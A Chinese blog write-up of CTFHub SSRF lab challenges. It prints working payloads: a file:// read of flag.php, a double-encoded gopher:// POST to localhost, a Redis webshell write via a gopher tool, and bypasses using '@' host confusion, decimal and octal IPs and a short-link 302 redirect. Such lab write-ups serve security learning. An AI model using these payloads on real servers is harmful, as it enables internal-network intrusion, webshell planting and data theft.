【CTFHUB】SSRF绕过方法之靶场实践(二)

最新推荐文章于 2024-03-18 14:36:06 发布
最新推荐文章于 2024-03-18 14:36:06 发布
阅读量375 收藏
点赞数 1
分类专栏: CTF Recording 文章标签: 网络安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Continuejww/article/details/133212770
版权

SSRF POST请求

提示信息:
这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

首先测试了http的服务请求,出现对话框
image.png
输入数值后提示:只能接受来自127.0.0.1的请求

右键查看源码发现key值

image.png

通过file协议读取flag.php页面的源码
构造 Payload:

?url=file:///var/www/html/flag.php

flag.php源码如下

<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=<?php echo $key;?>-->
</form>

尝试使用gopher 协议向服务器发送 POST 包,构造 gopher协议所需的 POST请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=fb00a2abc4b635472a398e19c222e665

在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。

需要对构造的请求包进行两次 URL编码:

一、将构造好的请求包进行第一次 URL编码:

image.png

在第一次编码后的,将%0A替换为%0D%0A。
因为 Gopher协议包含的请求数据包中,可能包含有=、&等特殊字符,避免与服务器解析传入的参数键值对混淆,所以对数据包进行 URL编码,这样服务端会把%后的字节当做普通字节。

二、二次URL编码得到如下 Gopher请求内容:

image.png

curl功能向目标发送 POST请求,构造如下Payload:

?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250A%250D%250Akey%253Dfb00a2abc4b635472a398e19c222e665

返回的页面请求如下
image.png

上传文件

提示信息:这次需要上传一个文件到flag.php了.祝你好运

进入到页面中,会看到是文件上传的页面,但是没有提交页面的请求,那么首先就在前端页面构造一个submit的请求方式。
(仿照"浏览"按钮)

点击提交的同时burp抓包

然后将其POST的/flag.php添加地址127.0.0.1,然后再将其整个POST请求包进行URL编码

之后将%0A替换成%0D%0A,进行第二次编码。

然后返回到起始的上传文件页面之后,抓取GET请求包

最后将GET请求包中的目录进行替换,替换成方才二次编码好的数据。之后在前面添加gopher://127.0.0.1:80的地址,注意“_”不可或缺,之后发送请求包就可以得到flag

redies协议

提示:这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

1.在kali上面输入命令:

python gophers.py --exploit redis

然后选择攻击模式和构造shell
第一个选项这里我们填写php,因为我们需要的是phpshell
第二个选项可以不填,默认根路径为/var/www/html
第三个就写入我们的shell代码


最后会生成指定的URL编码,认的写入文件名是shell.php 命令参数是qq

进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换

然后二次编码之后,输入payload之后显示504 Gateway Time-out,就代表了我们成功写入shell了,蚁剑连接查看就可以得到flag或者可以用get请求的方式直接回显在页面上

URL Bypass

提示信息:
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧。
利用@符号

构造PAYLOAD

http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

提示信息;
这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

构造payload

http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=http://017700000001#十六进制


http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=http://2130706433

1

302跳转 Bypass

提示信息:
SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

http://127.0.0.1/flag.php  # 将这条链接生成短链接

利用如下生成短链接:
https://www.toolnb.com/tools/duanwangzhi.html

http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=https://shorturl.at/lwADO

爱吃大米饭'
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网安知识系列:SSRF漏洞中绕过IP限制的几种方法总结
weixin_54626591的博客
04-21 275
SSRF漏洞中绕过IP限制的几种方法总结
Ctfhub解题 web SSRF(未完待续)
weixin_46703850的博客
03-21 998
Ctfhub解题 web SSRF(未完待续)
CTFHub -web-ssrf总结 (除去fastcgi和redis)超详细
m0_62879498的博客
02-11 2269
CTFHub -web-ssrf 练习总结 一,内网访问 尝试访问位于127.0.0.1的flag.php吧 所以我们可以直接构建url: /?url=http://127.0.0.1/flag.php 进行访问即可成功 二,为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们先尝试 ?url=http://127.0.0.1/flag.php 发现访问不见 这道题说白了是让我们访问本地计算机的web文件 所以我们使用 file 协议读取构造: /url=file:///var/ww
初识CTF Day4 CTFHUBSSRF
suxinAL的博客
10-02 2133
前言 这一次是对ssrf的探索,ctfhub技能树web就快结束了,期待淦进阶 正文 SSRF 内网访问 题目告诉访问127就直接访问下试试,但是没想到这么简单 ?url=127.0.0.1/flag.php 伪协议读取文件 题目提示:尝试去读取一下Web目录下的flag.php吧 可以联想到web目录一般是存放在 var/www/html/ 里面 所以payload如下 ?url=file:///var/www/html/flag.php 进入该页面,查看页面源代码得到flag 端口扫描 题目提示:来来
CTFHUB技能树-SSRF【持续更新】
qq_33295410的博客
09-16 7011
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6254
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的...通过靶场实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的...通过靶场实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
CTFHub技能树 Web-SSRF POST请求
Senimo
07-02 2725
POST请求 hint:这次是发一个HTTP POST请求,对了,ssrf是用php的curl实现的,并且会跟踪302跳转,加油吧骚年。 启动环境,访问页面为空白,查看URL: http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_ 通过 GET 传参直接拼接上127.0.0.1/flag.php,访问后得到一个输入框: 查看源码: <form action="/flag.php" method="post"> &l
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2199
ssrf
DAY37:SSRF 漏洞
qq_49433473的博客
08-22 1330
SSRF(Sever Side Request Forgery)—服务器端请求伪造、产生 SSRF 漏洞的函数、SSRF 漏洞可能存在的场景、SSRF 漏洞绕过方式、SSRF 漏洞的危害、SSRF 漏洞防御、小练习
CTF 题型 SSRF攻击以及绕过汇总笔记&例题总结
最新发布
qq_39947980的博客
03-18 3762
SSRF攻击方式以及绕过手法总结
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 5127
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
Pikachu靶场SSRF服务器端请求伪造
m0_46467017的博客
08-24 953
SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
SSRF(10)302跳转 Bypass
m0_64417923的博客
05-22 2365
题目描述:SSRF中有个很重要的一点是请求可能会跟随302跳转。尝试利用这个来绕过对IP的检测,访问到位于127.0.0.1的flag.php吧。 相关知识 什么是HTTP 302 跳转? 首先我们要知道状态码,状态码是HTTP请求过程结果的描述,由三位数字组成。这三位数字描述了请求过程中所发生的情况。状态码位于响应的起始行中,如在 HTTP/1.0 200 OK 中,状态码就是 200。 每个状态码的第一位数字都用于描述状态(“成功”、“出错”等)。如200 到 299 之间的状态码表示成功;3
SSRF漏洞,绕过,实战化演示
m_de_g的博客
08-13 988
SSRF 漏洞 1.介绍ssrf漏洞 SSRF(Server-Side Request Forgery,服务度器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。 2.SSRF漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用数据的功能且没有对目标地址做过过滤与限制。例如,黑客操作服务器端从URL地址获取网页文本内容,加载指定地址的图片等,利用的
SSRF绕过IP限制方法总结
weixin_30575309的博客
09-04 1202
SSRF绕过IP限制方法总结 - Summary of SSRF methods for bypassing IP restrictions -https://www.cnblogs.com/iAmSoScArEd/p/11458850.html 一、SSRF简介 SSRF(Server-Side Request Forgery,服务器端请求伪造):通俗的来说就是我们可以伪造服务器...
CTFHub技能树 Web-SSRF 302跳转 Bypass
Senimo
07-05 3381
CTFHub技能树 Web-SSRF 302跳转 Bypass hint:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧 启动环境,依然为空白界面,查看URL: http://challenge-722b117ccdc24f8e.sandbox.ctfhub.com:10800/?url=_ 其中有通过GET传参的url,尝试访问127.0.0.1/flag.php页面: 提示:不允许企业内部IP访问,使用file协议
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值